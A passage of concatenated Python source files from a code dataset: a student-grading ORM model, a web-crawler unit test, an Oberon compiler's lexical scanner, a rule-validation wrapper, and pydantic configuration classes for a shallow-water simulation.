''\n return s.format(self.total_points,\n self.task.total_max_points)\n\n @property\n def status(self):\n return GradingStatus.Values(\n (self.processed is not None) + self.completed)\n\n class Meta:\n indexes = (\n (('student', 'task', 'ex'), True),\n )\n\n\nclass GradingComment(BaseModel):\n grading = ForeignKeyField(Grading, related_name='comments')\n comment = ForeignKeyField(Comment, related_name='gradings')\n\n @property\n def context(self):\n return self.grading\n\n @property\n def student(self):\n return self.grading.student\n\n @property\n def ex(self):\n return self.grading.ex if self.grading.ex is not None \\\n else self.grading.task.ex\n\n\nclass ExerciseComment(BaseModel):\n student = ForeignKeyField(Student)\n ex = ForeignKeyField(Exercise, related_name='used_ex_comments')\n cat = ForeignKeyField(Category)\n comment = ForeignKeyField(Comment, related_name='ex_coms')\n\n @property\n def context(self):\n return self.cat\n\n\nclass ExerciseQuestion(BaseModel):\n ex = ForeignKeyField(Exercise, related_name='ex_questions')\n question = CharField()\n\n\nclass ExtraProjects(BaseModel):\n name = Searchable.CharField()\n ex = ForeignKeyField(Exercise, related_name='projects')\n\n\nclass Directory(BaseModel, DirectoryBase):\n urltest = re.compile(\"^https?://\")\n REP_STRING = \"asp{rep:02d}\"\n\n name = Searchable.CharField(unique=True)\n path = CharField()\n parent = ForeignKeyField('self', related_name='children', null=True,\n to_field='name')\n svn_rep = CharField(null=True)\n file_type = ForeignKeyField(FileType, null=True, default=FileType.DIR)\n\n # self.urltest.match(self.path):\n\n @property\n def absolute(self, *others):\n pathlist = [getcwd()] + [d.path for d in self.ancestors] + list(\n others)\n abs_path = path.abspath(path.join(*pathlist))\n return abs_path\n\n @property\n def relative(self):\n return self.rel_root(self)\n\n @property\n def type(self):\n return self.Type(self.path.endswith('/'))\n\n @property\n def repository_dir(self):\n return next(x for x in self.ancestors if x.svn_rep)\n\n @property\n def repository(self):\n return LocalClient(self.repository_dir.absolute)\n\n @property\n def Name(self):\n return self.name + ' ' + self.type.name.lower()\n\n root = Record(name=\"root\", path=\"..\")\n student = Record(name=\"repository {rep}\",\n path=\"svn/{}/\".format(REP_STRING),\n parent=root, svn_rep=\"https://proglang.informatik.uni-\"\n \"freiburg.de/svn/asp{rep:02d}\")\n internal = Record(name=\"internal repository\",\n path=\"svn/internal/\",\n parent=root, svn_rep=\"https://proglang.informatik.uni-\"\n \"freiburg.de/svn/proglang/teaching/\"\n \"AndroidSmartphoneProgramming/2015\")\n\n exercise_pdf = Record(name=\"exercise sheet\",\n path=\"Material/ex/{Name}.pdf\",\n file_type=FileType.PDF,\n parent=root)\n old_mistakes = Record(name=\"mistakes from former exercises\",\n path=\"old/2014/Mistakes_Ex{nr}.txt\",\n file_type=FileType.TXT,\n parent=internal)\n grading_key = Record(name=\"grading key\",\n path=\"grading/ex{nr}.txt\",\n file_type=FileType.TXT,\n parent=internal)\n\n grading_pre_folder = Record(name=\"preliminary gradings\",\n path=\"gradings/ex{nr}/\",\n parent=internal)\n grading_pre = Record(name=\"preliminary grading\",\n path=\"asp{rep:02d}_{user}.txt\",\n file_type=FileType.TXT,\n parent=grading_pre_folder)\n grading_notes = Record(name=\"grading notes\",\n path=\"Notes.txt\",\n file_type=FileType.TXT,\n parent=grading_pre_folder)\n grading_report = Record(name=\"gradings report\",\n path=\"grading.txt\",\n file_type=FileType.TXT,\n 
parent=internal)\n grading = Record(name=\"student grading\",\n path=\"grading/ex{nr}.txt\",\n file_type=FileType.TXT,\n parent=student)\n\n ProjectPath = Record(name=\"AS Project\",\n path=\"exercise{nr}/\",\n file_type=FileType.ASP,\n parent=student)\n Report = Record(name='Report',\n path='{user}_report{nr}.pdf',\n file_type=FileType.PDF,\n parent=ProjectPath)\n IdeaProjectFolder = Record(name='.idea Project',\n path='.idea/',\n parent=ProjectPath)\n AppDir = Record(name='App',\n path=\"app/\",\n parent=ProjectPath)\n Manifest = Record(name=\"Manifest\",\n path=\"src/main/AndroidManifest.xml\",\n file_type=FileType.XML,\n parent=AppDir)\n StringsXML = Record(name=\"Strings XML\",\n path=\"src/main/res/values/strings.xml\",\n file_type=FileType.XML,\n parent=AppDir)\n ProjectIml = Record(name='project iml',\n path='{projectname}.iml',\n file_type=FileType.OTH,\n parent=ProjectPath)\n AppIml = Record(name='app iml',\n path='app.iml',\n file_type=FileType.OTH,\n parent=AppDir)\n GradleBuild = Record(name='build.gradle',\n path='build.gradle',\n file_type=FileType.OTH,\n parent=ProjectPath)\n GradleBuildApp = Record(name='(app) build.gradle',\n path='build.gradle',\n file_type=FileType.OTH,\n parent=AppDir)\n GradleSettings = Record(name='gradle settings',\n path='settings.gradle',\n file_type=FileType.OTH,\n parent=ProjectPath)\n PackageFolders = Record(name='Package',\n path='src/androidTest/java/androidlab/{user}/exercise{nr}/',\n parent=AppDir)\n\n def stud_ex_path(self, s, ex, project=None):\n kw = dict(directory=self, student=s, ex=ex)\n if project is None:\n args = (CustomStudenPath.project.is_null(),)\n else:\n args = ()\n assert isinstance(project, ExtraProjects), TypeError\n assert project.ex == ex, IntegrityError\n kw['project'] = project\n try:\n return CustomStudenPath.get(*args, **kw)\n except:\n return CustomStudenPath(*args, **kw)\n\n @classmethod\n def rel_root(cls, pth):\n if isinstance(pth, cls):\n pth = pth.absolute\n return path.relpath(pth, cls.root.absolute)\n\n\nclass CustomStudenPath(BaseModel, DirectoryBase):\n # CURRENT_PROJECT = None\n # DEFAULT_PROJECT = 'exercise{nr}/'\n\n directory = ForeignKeyField(Directory)\n student = ForeignKeyField(Student)\n project = ForeignKeyField(ExtraProjects, null=True, default=None)\n ex = ForeignKeyField(Exercise)\n custom_path = CharField()\n\n @property\n def parent(self):\n r = self.directory.parent\n if isinstance(r, Directory):\n return r.stud_ex_path(self.student, self.ex, self.project)\n\n @property\n def path(self):\n format_vars = self.student.format_vars\n format_vars.add(self.ex.format_vars)\n if self.directory != Directory.ProjectPath:\n pp = Directory.ProjectPath.stud_ex_path(self.student, self.ex,\n self.project).path\n if pp.endswith(path.sep):\n pp = pp[:-1]\n format_vars['projectname'] = path.split(pp)[-1]\n\n return (self.custom_path or self.directory.path).format(**format_vars)\n\n @property\n def Name(self):\n return self.directory.Name\n\n @property\n def file_type(self):\n return self.directory.file_type\n\n def fix_path(self):\n if self.exists and path.isdir(\n self.absolute) and not self.custom_path.endswith(path.sep):\n self.custom_path += path.sep\n return True\n return False\n\n @property\n def repository_dir(self):\n return self.directory.repository_dir.stud_ex_path(self.student,\n self.ex,\n self.project)\n\n @property\n def repository(self):\n return LocalClient(self.repository_dir.absolute)\n\n @property\n def absolute(self):\n pathlist = [getcwd()] + [d.path for d in\n self.ancestors]\n return 
path.abspath(path.join(*pathlist))\n\n def get_svn_info(self):\n return self.repository.info(self.relative_to_repo)\n\n @property\n def original(self):\n return not self.custom_path # self.is_dirty()\n\n @property\n def status(self):\n v = 0\n try:\n if self.exists:\n v += 1\n if self.get_svn_info():\n v += 1\n if self.original:\n return self.Status.Exists\n except:\n pass\n return self.Status(v)\n\n @property\n def status_string(self):\n return str(self.status).format(self.Name)\n\n @property\n def Name(self):\n return self.directory.name + ' ' + self.type.name.lower()\n\n def append(self, tail):\n self.custom_path = path.join(self.path, tail)\n\n # def __iadd__(self, other):\n\n def __add__(self, other):\n c = self.clone()\n c.append(other)\n return c\n\n class Status(AddEnum):\n DoesNotExist = 0\n ExistsNoSVN = 1\n ExistsChanged = 2\n Exists = 3\n\n @property\n def comment(self):\n return [\n 'The {name} is missing. ({rel_original})',\n 'The {name} is missing (but was added to the repository later - this should not be in a final grading!).',\n 'The {name} is at {rel_custom} instead of the expected location {rel_original}.',\n None,\n ][self.value]\n\n def __str__(self):\n return [\n 'The {} is missing in the filesystem.',\n 'The {} is missing in the repository.',\n 'The {} is present (custom location).',\n 'The {} is present.',\n ][self.value]\n\n @classproperty\n def searchable(cls):\n return [cls, Student, Exercise]\n\n class Meta:\n indexes = (\n (('directory', 'student', 'ex'), False),\n (('directory', 'student', 'ex', 'project'), True),\n )\n\n\ndef model_filter(obj):\n return issubclass(type(obj), type) and \\\n issubclass(obj, BaseModel) and \\\n obj is not BaseModel\n","repo_name":"IARI/asp_grader","sub_path":"models.py","file_name":"models.py","file_ext":"py","file_size_in_byte":44043,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"42781951844","text":"#!/usr/bin/env python\n\"\"\"Unit test for Controller methods\n\nRun a docker nginx server from the samples folder:\n```\ncd tests/samples\ndocker run -p 8000:80 -v $(pwd):/usr/share/nginx/html nginx\n```\n\"\"\"\nimport sys\nimport unittest\n\nimport re\n\nfrom grepspider.spider import Spider\n\nsys.path.append('..')\n\n\nclass TestGrepSpider(unittest.TestCase):\n\n PAGES_ROOT_URL = 'http://localhost:8000/pages'\n\n def setUp(self):\n self.links = None\n self.spider = None\n pass\n\n def _crawl(self, provider, *flags, recursive=False):\n self._crawl_by_spoil(\n provider,\n 'title[^(?: is not a spoil)]',\n *flags,\n recursive=recursive\n )\n\n def _crawl_by_spoil(\n self,\n provider,\n spoil_pattern,\n *flags,\n recursive=False,\n spoil_context=0\n ):\n links = tuple(provider())\n regex_flags = flags\n self.spider = Spider(*links, recursive=recursive)\n self.spider.crawl(\n *regex_flags,\n spoil_pattern=spoil_pattern,\n spoil_context=spoil_context\n )\n\n def test_recursive(self):\n self._crawl(self.provide_1_link_recursive, re.IGNORECASE, recursive=True)\n unique = 13\n broken = 1\n stored = 30\n spoil = 37\n external = 2\n self._assert_counters(unique, broken, stored, spoil, external)\n\n def test_recursive_no_flags(self):\n self._crawl(self.provide_1_link_recursive, recursive=True)\n unique = 13\n broken = 1\n stored = 30\n spoil = 25\n external = 2\n self._assert_counters(unique, broken, stored, spoil, external)\n\n def test_mailto_link_issue(self):\n \"\"\"\n @see https://github.com/westial/grepspider/issues/1\n \"\"\"\n self._crawl(self.provide_mailto_link, 
recursive=True)\n unique = 1\n broken = 0\n stored = 0\n spoil = 2\n external = 0\n self._assert_counters(unique, broken, stored, spoil, external)\n\n def test_clear_spoil(self):\n self._crawl_by_spoil(\n self.provide_clear_spoil_link,\n \"lorem ipsum\",\n re.IGNORECASE,\n recursive=False,\n spoil_context=100\n )\n unique = 29\n broken = 0\n stored = 94\n spoil = 23\n external = 61\n self._assert_counters(unique, broken, stored, spoil, external)\n\n def test_no_recursive_multiple(self):\n self._crawl(self.provide_2_links, re.IGNORECASE)\n unique = 8\n broken = 0\n stored = 9\n spoil = 7\n external = 2\n self._assert_counters(unique, broken, stored, spoil, external)\n\n def _assert_counters(self, unique, broken, stored, spoil, external):\n self.assertEqual(\n unique, len(self.spider._unique_links), 'Local unique links'\n )\n self.assertEqual(\n broken, self.spider._total_count_broken, 'Local broken links'\n )\n self.assertEqual(\n stored, self.spider._total_count_stored, 'Links found'\n )\n self.assertEqual(\n spoil, self.spider._total_count_spoil, 'Spoils found'\n )\n self.assertEqual(\n external, self.spider._total_count_external, 'External links'\n )\n\n @classmethod\n def provide_1_link_wikipedia(cls):\n return ['https://donate.wikimedia.org']\n\n @classmethod\n def provide_2_links(cls):\n return ['{!s}/page10.html'.format(cls.PAGES_ROOT_URL), '{!s}/page1.html'.format(cls.PAGES_ROOT_URL)]\n\n @classmethod\n def provide_1_link_recursive(cls):\n return ['{!s}/page1.html'.format(cls.PAGES_ROOT_URL)]\n\n @classmethod\n def provide_mailto_link(cls):\n return ['{!s}/page_mailto.html'.format(cls.PAGES_ROOT_URL)]\n\n @classmethod\n def provide_clear_spoil_link(cls):\n return ['{!s}/loremipsum.html'.format(cls.PAGES_ROOT_URL)]\n","repo_name":"westial/grepspider","sub_path":"tests/testgrepspider.py","file_name":"testgrepspider.py","file_ext":"py","file_size_in_byte":3949,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"5090188479","text":"#Лексический анализатор\n\nfrom enum import Enum #подключаем класс Enum\nimport string\n\nimport text #подключаем текстовый драйвер\nimport error #подключаем сообщения об ошибках\nimport loc\n\n\n#объявляем класс Lex производный от Enum с перечислением лексем\nclass Lex(Enum):\n NONE, NAME, NUM, MODULE, IMPORT, BEGIN, END, CONST, \\\n VAR, WHILE, DO, IF, THEN, ELSIF, ELSE, MULT, DIV, MOD, \\\n PLUS, MINUS, EQ, NE, LT, LE, GT, GE, DOT, COMMA, \\\n COLON, SEMI, ASS, LPAR, RPAR, EOT = range(34) # COLON - двоеточие\n\nlex = Lex.NONE #хранит текущую лексему\nnum = 0 #содержит значение числа, если лексема NUM\nname = \"\" #содержит имя, если лексема NAME\n\nMAXINT = 0x7FFFFFFF #ограничение типа int 32-разрядами\n\n#переменная _kw - это хэш-таблица (словарь) (_ используется только в этом файле)\n_kw = { #словарь с именами и константами ключевых слов\n \"MODULE\": Lex.MODULE,\n \"IMPORT\": Lex.IMPORT,\n \"CONST\": Lex.CONST,\n \"VAR\": Lex.VAR,\n \"BEGIN\": Lex.BEGIN,\n \"END\": Lex.END,\n \"IF\": Lex.IF,\n \"THEN\": Lex.THEN,\n \"ELSIF\": Lex.ELSIF,\n \"ELSE\": Lex.ELSE,\n \"WHILE\": Lex.WHILE,\n \"DO\": Lex.DO,\n \"DIV\": Lex.DIV,\n \"MOD\": Lex.MOD,\n \"ARRAY\": Lex.NONE,\n \"RECORD\": Lex.NONE,\n \"POINTER\": Lex.NONE,\n \"SET\": Lex.NONE,\n \"WITH\": Lex.NONE,\n \"CASE\": Lex.NONE,\n \"OF\": Lex.NONE,\n \"LOOP\": Lex.NONE,\n \"EXIT\": Lex.NONE,\n \"PROCEDURE\": Lex.NONE,\n \"FOR\": Lex.NONE,\n \"TO\": Lex.NONE,\n \"BY\": Lex.NONE,\n \"IN\": Lex.NONE,\n \"IS\": Lex.NONE,\n \"NIL\": Lex.NONE,\n \"OR\": 
Lex.NONE,\n \"TYPE\": Lex.NONE,\n \"REPEAT\": Lex.NONE,\n \"UNTIL\": Lex.NONE,\n \"RETURN\": Lex.NONE\n}\n\n\n# словарь для подставления имени лексемы в сообщении об ошибках\n_names = {\n Lex.NAME: 'имя',\n Lex.NUM: 'число',\n Lex.MULT: '\"*\"',\n Lex.PLUS: '\"+\"',\n Lex.MINUS: '\"-\"',\n Lex.EQ: '\"=\"',\n Lex.NE: '\"#\"',\n Lex.LT: '\"<\"',\n Lex.LE: '\"<=\"',\n Lex.GT: '\">\"',\n Lex.GE: '\">=\"',\n Lex.DOT: '\".\"',\n Lex.COMMA: '\",\"',\n Lex.COLON: '\":\"',\n Lex.SEMI: '\";\"',\n Lex.ASS: '\":=\"',\n Lex.LPAR: '\"(\"',\n Lex.RPAR: '\")\"',\n Lex.EOT: '\"конец текста\"',\n}\n\n# подставляет имя лексемы для сообщения об ошибках\ndef lexName(L: Lex):\n return _names.get(L, L.name)\n\n\n#Собирает имя идентификатора в одну строку\ndef scanName():\n global name, lex #Указываем, что name и lex глобальные переменные\n name = text.ch #Первый символ идентификатора или ключевого слова\n text.nextCh()\n while text.ch in string.ascii_letters + string.digits:\n name += text.ch #читаем остальные символы и цифры\n text.nextCh()\n #print(name)\n lex = _kw.get(name, Lex.NAME) #если ключ есть в словаре..., если нет, то второй параметр\n #print(lex)\n\n\n#собираем число\ndef scanNumber():\n global num, lex #глобальная переменная\n num = 0\n while text.ch in string.digits: #пока идут цифры\n #d = int(text.ch) #конвертируем строку в integer\n d = ord(text.ch) - ord('0') #перевод из строки в int через вычитание кода ASCII\n if num > (MAXINT - d)//10: #проверка на размер int\n error.lexError(\"Слишком большое число\")\n else:\n num = 10*num + d #накапливание числа слева направо\n text.nextCh()\n lex = Lex.NUM\n #print(num)\n\n\n#обработка комментариев\ndef Comment():\n # пропуск *\n text.nextCh()\n while True:\n while text.ch not in {'*', text.chEOT}:\n # проверяем на начало вложенного комментария\n if text.ch == '(':\n text.nextCh()\n if text.ch == '*':\n Comment()\n else:\n text.nextCh()\n if text.ch == text.chEOT:\n error.lexError(\"Не закончен комментарий\")\n else: # здесь *\n text.nextCh()\n if text.ch == ')': break\n\n text.nextCh()\n\n\n#функция выбора следующей лексемы (это и есть сам сканер)\ndef nextLex():\n global lex #глобальная переменная\n\n while text.ch in {text.chSPACE, text.chTAB, text.chEOL}:\n text.nextCh() #пропускаем пробелы, табуляцию, и конец строки\n\n # переводим указатель курсора на начало лексемы\n loc.lexPos = loc.pos\n\n if text.ch in string.ascii_letters: #если сивол (большой и малый регистр)\n scanName()\n elif text.ch in string.digits: #если цифра\n scanNumber()\n elif text.ch == ';':\n lex = Lex.SEMI\n text.nextCh()\n elif text.ch == '.':\n lex = Lex.DOT\n text.nextCh()\n elif text.ch == ',':\n lex = Lex.COMMA\n text.nextCh()\n elif text.ch == '+':\n lex = Lex.PLUS\n text.nextCh()\n elif text.ch == '-':\n lex = Lex.MINUS\n text.nextCh()\n elif text.ch == '*':\n lex = Lex.MULT\n text.nextCh()\n elif text.ch == ':':###########\n text.nextCh()\n if text.ch == '=':\n lex = Lex.ASS\n text.nextCh()\n else:\n lex = Lex.COLON\n elif text.ch == '=':\n lex = Lex.EQ\n text.nextCh()\n elif text.ch == '#':\n lex = Lex.NE\n text.nextCh()\n elif text.ch == '>':###########\n text.nextCh()\n if text.ch == '=':\n lex = Lex.GE\n text.nextCh()\n else:\n lex = Lex.GT\n elif text.ch == '<':###########\n text.nextCh()\n if text.ch == '=':\n lex = Lex.LE\n text.nextCh()\n else:\n lex = Lex.LT\n elif text.ch == '(':#############\n text.nextCh()\n if text.ch == '*':\n Comment() #пропускаем комментарий\n nextLex() #вызываем новую лексему\n else:\n lex = Lex.LPAR\n elif text.ch == ')':\n lex = 
Lex.RPAR\n text.nextCh()\n elif text.ch == text.chEOT: #если конец файла\n lex = Lex.EOT\n else:\n error.lexError(\"Недопустимый символ\")\n text.nextCh()\n\n\n#def lex():\n# return _lex\n\n","repo_name":"GorComComputing/Oberon_Compiler","sub_path":"scan.py","file_name":"scan.py","file_ext":"py","file_size_in_byte":7004,"program_lang":"python","lang":"ru","doc_type":"code","stars":1,"dataset":"github-code","pt":"40"} +{"seq_id":"70401554362","text":"import datetime\n\nfrom antlr4 import InputStream, CommonTokenStream\n\nfrom rebbval.RebbValErrorListener import RebbValErrorListener\nfrom rebbval.EvalVisitor import EvalVisitor\nfrom rebbval.RebbValHelper import RebbValHelper\nfrom rebbval.RebbValLexer import RebbValLexer\nfrom rebbval.RebbValParser import RebbValParser\n\n\nclass RebbVal:\n global_config = dict()\n\n def __init__(self):\n self.has_error = False\n self.errors = []\n self.engine = EvalVisitor(\"\", RebbVal.global_config)\n\n def date(self, date_str):\n try:\n return datetime.datetime.strptime(date_str, '%Y-%m-%d')\n except ValueError as error:\n self.errors.append(str(error))\n return None\n\n def year(self, year_str):\n try:\n return datetime.datetime.strptime(year_str + \"-01-01\", '%Y-%m-%d')\n except ValueError as error:\n self.errors.append(str(error))\n return None\n\n\n @staticmethod\n def add_global_config(key, value):\n RebbVal.global_config[key] = value\n\n def add_config(self, key, value):\n self.engine.add_config(key, value)\n\n def val(self, obj, condition):\n self.errors = []\n\n input_stream = InputStream(condition)\n lexer = RebbValLexer(input_stream)\n stream = CommonTokenStream(lexer)\n parser = RebbValParser(stream)\n parser.addErrorListener(RebbValErrorListener.INSTANCE)\n tree = parser.unaryTests()\n if RebbValErrorListener.INSTANCE.error:\n self.errors.append(RebbValErrorListener.INSTANCE.error)\n RebbValErrorListener.INSTANCE.error = \"\"\n return False\n\n self.engine.set_object(obj)\n self.engine.visit(tree)\n if not self.engine.is_valid():\n self.has_error = True\n if obj is None:\n error_message = \"object is null\"\n else:\n error_message = str(obj) + \" \" + condition + \" failed\"\n\n if self.engine.get_error() is not None and self.engine.get_error() != \"\":\n error_message = error_message + \"(\" + self.engine.get_error() + \")\"\n\n self.errors.append(error_message)\n return False\n\n return True\n\n def register_custom_validator(self, name, func):\n return self.engine.register_custom_validator(name, func)\n\n","repo_name":"tmfc/RebbVal-Python","sub_path":"rebbval/RebbVal.py","file_name":"RebbVal.py","file_ext":"py","file_size_in_byte":2343,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"40"} +{"seq_id":"39699101618","text":"import pathlib as _pathlib\nfrom typing import Literal as _Literal\nfrom typing import Tuple as _Tuple\nfrom typing import Union as _Union\nfrom typing import Optional as _Optional\nfrom yaml import load as _load\nfrom yaml import Loader as _Loader\nfrom yaml import add_constructor as _add_constructor\nfrom yaml import add_representer as _add_representer\nfrom pydantic import BaseModel as _BaseModel\nfrom pydantic import Field as _Field\nfrom pydantic import validator as _validator\nfrom pydantic import root_validator as _root_validator\nfrom pydantic import conint as _conint\nfrom pydantic import confloat as _confloat\nfrom pydantic import validate_model as _validate_model\n\n\n# alias to type hints\nBCTypeHint = _Literal[\"periodic\", \"extrap\", \"const\", \"inflow\", 
\"outflow\"]\n\nOutputTypeHint = _Union[\n _Tuple[_Literal[\"at\"], _Tuple[_confloat(ge=0), ...]],\n _Tuple[\n _Literal[\"t_start every_seconds multiple\"],\n _confloat(ge=0), _confloat(gt=0), _conint(ge=1)\n ],\n _Tuple[_Literal[\"t_start every_steps multiple\"], _confloat(ge=0), _conint(ge=1), _conint(ge=1)],\n _Tuple[_Literal[\"t_start t_end n_saves\"], _confloat(ge=0), _confloat(gt=0), _conint(ge=1)],\n _Tuple[_Literal[\"t_start t_end no save\"], _confloat(ge=0), _confloat(gt=0)],\n _Tuple[_Literal[\"t_start n_steps no save\"], _confloat(ge=0), _conint(ge=1)],\n]\n\nTemporalTypeHint = _Literal[\"Euler\", \"SSP-RK2\", \"SSP-RK3\"]\n\n\nclass BaseConfig(_BaseModel):\n \"\"\"Extending pydantic.BaseModel with __getitem__ method.\"\"\"\n\n class Config: # pylint: disable=too-few-public-methods\n \"\"\"pydantic configuration of this model.\"\"\"\n validate_all = True\n allow_population_by_field_name = True\n arbitrary_types_allowed = True\n extra = \"forbid\"\n\n def __getitem__(self, key):\n return super().__getattribute__(key)\n\n def __setitem__(self, key, value):\n self.__setattr__(key, value)\n\n def check(self):\n \"\"\"Manually trigger the validation of the data in this instance.\"\"\"\n _, _, validation_error = _validate_model(self.__class__, self.__dict__)\n\n if validation_error:\n raise validation_error\n\n for field in self.__dict__.values():\n if isinstance(field, BaseConfig):\n field.check()\n\n\nclass SpatialConfig(BaseConfig):\n \"\"\"An object holding spatial configuration.\n\n Attributes\n ----------\n domain : a list/tuple of 4 floats\n The elements correspond the the bounds in west, east, south, and north.\n discretization : a list/tuple of 2 int\n The elements correspond the number of cells in west-east and south-north directions.\n \"\"\"\n # pylint: disable=too-few-public-methods, no-self-argument, invalid-name, no-self-use\n\n domain: _Tuple[float, float, float, float]\n discretization: _Tuple[_conint(strict=True, gt=0), _conint(strict=True, gt=0)]\n\n @_validator(\"domain\")\n def domain_direction(cls, v):\n \"\"\"Validate the East >= West and North >= South.\n \"\"\"\n assert v[1] > v[0], \"domain[1] must greater than domain[0]\"\n assert v[3] > v[2], \"domain[3] must greater than domain[2]\"\n return v\n\n\nclass TemporalConfig(BaseConfig):\n \"\"\"An object holding temporal configuration.\n\n Attributes\n ----------\n start : float\n The start time of the simulation, i.e., the time that the initial conditions are applied.\n end : float\n The end time of the simulation, i.e., the simulation stops when reaching this time.\n output : list/tuple or None\n Three available formats:\n 1. [\"at\", [t1, t2, t3, t4, ...]]:\n saves solutions at t1, t2, t3, ..., etc.\n 2. [\"t_start every_seconds multiple\", t0, dt, n]:\n starting from t0, saves solutions every dt seconds for n times.\n 3. [\"t_start every_steps multiple\", t0, n0, n1]:\n starting from t0, saves solutions every n0 time steps for n1 times\n 4. [\"t_start t_end n_saves\", t0, t1, n]:\n starting from t0, evenly saves n solutions up to time t1.\n 5. [\"t_start t_end no save\", t0, t1]:\n runs the simulation from t0 to t1 without saving any solutions.\n 6. [\"t_start n_steps no save\", t0, n]:\n runs the simulation from t0 and runs for n steps without saving any solutions.\n Default: None\n scheme : str\n Currently, either \"Euler\", \"RK2\", or \"RK4\". Default: \"RK2\"\n \"\"\"\n # pylint: disable=too-few-public-methods, no-self-argument, invalid-name, no-self-use\n\n dt: _confloat(gt=0.) 
= 1e-3\n    adaptive: bool = True\n    output: OutputTypeHint\n    max_iters: _conint(gt=0) = _Field(1000000, alias=\"max iterations\")\n    scheme: TemporalTypeHint = \"SSP-RK2\"\n\n    @_validator(\"output\")\n    def _val_output_method(cls, v, values):\n        \"\"\"Validate the output specification.\"\"\"\n\n        if v[0] == \"at\":\n            msg = \"Times are not monotonically increasing\"\n            assert all(v[1][i] > v[1][i-1] for i in range(1, len(v[1]))), msg\n        elif v[0] in [\"t_start every_steps multiple\", \"t_start n_steps no save\"]:\n            assert not values[\"adaptive\"], \"Needs \\\"adaptive=False\\\".\"\n        elif v[0] in [\"t_start t_end n_saves\", \"t_start t_end no save\"]:\n            assert v[2] > v[1], \"End time is not greater than start time.\"\n\n        return v\n\n    @_validator(\"max_iters\")\n    def _val_max_iters(cls, v, values):\n        \"\"\"Validate and modify max_iters.\"\"\"\n        try:\n            if values[\"output\"][0] in [\"t_start every_steps multiple\", \"t_start n_steps no save\"]:\n                v = values[\"output\"][2] # use per_step as max_iters\n        except KeyError as err:\n            raise AssertionError(\"Fix `output` first\") from err\n        return v\n\n\nclass SingleBCConfig(BaseConfig):\n    \"\"\"An object holding configuration of the boundary conditions on a single boundary.\n\n    Attributes\n    ----------\n    types : a length-3 tuple/list of str\n        Boundary conditions correspond to the three conservative quantities. If the type is\n        \"inflow\", they correspond to non-conservative quantities, i.e., u and v. Applying \"inflow\"\n        to depth h or elevation w does not seem to make any sense.\n    values : a length-3 tuple of floats or None\n        Some BC types require user-provided values (e.g., \"const\"). Use this to give values.\n        Usually, they are the conservative quantities, i.e., w, hu, and hv. For \"inflow\", however,\n        they are non-conservative quantities, i.e., u and v. Default: [None, None, None]\n    \"\"\"\n    # pylint: disable=too-few-public-methods, no-self-argument, invalid-name, no-self-use\n\n    types: _Tuple[BCTypeHint, BCTypeHint, BCTypeHint]\n    values: _Tuple[_Optional[float], _Optional[float], _Optional[float]] = [None, None, None]\n\n    @_validator(\"types\")\n    def check_periodicity(cls, v):\n        \"\"\"If one component is periodic, all components should be periodic.\"\"\"\n        if any(t == \"periodic\" for t in v):\n            assert all(t == \"periodic\" for t in v), \"All components should be periodic.\"\n        return v\n\n    @_validator(\"values\")\n    def check_values(cls, v, values):\n        \"\"\"Check if values are set accordingly for some BC types.\n        \"\"\"\n        if \"types\" not in values:\n            return v\n\n        for bctype, bcval in zip(values[\"types\"], v):\n            if bctype in (\"const\", \"inflow\"):\n                assert isinstance(bcval, float), \\\n                    f\"Using BC type \\\"{bctype}\\\" requires setting a value.\"\n        return v\n\n\nclass BCConfig(BaseConfig):\n    \"\"\"An object holding configuration of the boundary conditions of all boundaries.\n\n    Attributes\n    ----------\n    west, east, north, south : SingleBCConfig\n        Boundary conditions on west, east, north, and south boundaries.\n    \"\"\"\n    # pylint: disable=too-few-public-methods, no-self-argument, invalid-name, no-self-use\n\n    west: SingleBCConfig\n    east: SingleBCConfig\n    north: SingleBCConfig\n    south: SingleBCConfig\n\n    @_root_validator(pre=False)\n    def check_periodicity(cls, values):\n        \"\"\"Check whether periodic BCs match at corresponding boundary pairs.\"\"\"\n        if any((t not in values) for t in [\"west\", \"east\", \"south\", \"north\"]):\n            return values\n\n        result = True\n        for types in zip(values[\"west\"][\"types\"], values[\"east\"][\"types\"]):\n            if any(t == \"periodic\" for t in types):\n                result = all(t == \"periodic\" for t in types)\n        for types in zip(values[\"north\"][\"types\"], values[\"south\"][\"types\"]):\n            if any(t == \"periodic\" for t in types):\n                result = all(t == \"periodic\" for t in types)\n        if not result:\n            raise ValueError(\"Periodic BCs do not match at boundaries and components.\")\n        return values\n\n\nclass ICConfig(BaseConfig):\n    \"\"\"An object holding configuration of the initial conditions.\n\n    Attributes\n    ----------\n    file : None or str or path-like object\n        The path to a NetCDF file containing IC data.\n    keys : None or a tuple/list of str\n        The variable names in the `file` that correspond to w, hu, and hv. If `file` is None, this\n        can be None.\n    values : None or a tuple/list of floats\n        If `file` is None, use this attribute to specify constant IC values.\n    \"\"\"\n    # pylint: disable=too-few-public-methods, no-self-argument, invalid-name, no-self-use\n\n    file: _Optional[_pathlib.Path]\n    keys: _Optional[_Tuple[str, str, str]]\n    xykeys: _Optional[_Tuple[str, str]]\n    values: _Optional[_Tuple[float, float, float]]\n\n    @_root_validator(pre=True)\n    def check_mutually_exclusive_attrs(cls, values):\n        \"\"\"\\\"file\\\" and \\\"values\\\" should be mutually exclusive.\n        \"\"\"\n        if \"file\" in values and values[\"file\"] is not None:\n            if \"values\" in values and values[\"values\"] is not None:\n                raise AssertionError(\"Only one of \\\"file\\\" or \\\"values\\\" can be set for I.C.\")\n\n            if \"keys\" not in values or values[\"keys\"] is None:\n                raise AssertionError(\"\\\"keys\\\" has to be set when \\\"file\\\" is not None for I.C.\")\n\n            if \"xykeys\" not in values or values[\"xykeys\"] is None:\n                raise AssertionError(\"\\\"xykeys\\\" has to be set when \\\"file\\\" is not None for I.C.\")\n        else: # \"file\" is not specified or is None\n            if \"values\" not in values or values[\"values\"] is None:\n                raise AssertionError(\"Either \\\"file\\\" or \\\"values\\\" has to be set for I.C.\")\n\n        return values\n\n\nclass TopoConfig(BaseConfig):\n    \"\"\"An object holding configuration of the topography file.\n\n    Attributes\n    ----------\n    file : str or path-like object\n        The path to a NetCDF file containing topography data.\n    key : str\n        The variable name in the `file` that corresponds to elevation data.\n    \"\"\"\n    # pylint: disable=too-few-public-methods, no-self-argument, invalid-name, no-self-use\n\n    file: _pathlib.Path\n    key: str\n    xykeys: _Tuple[str, str]\n\n\nclass PointSourceConfig(BaseConfig):\n    \"\"\"An object holding configuration of point sources.\n\n    Attributes\n    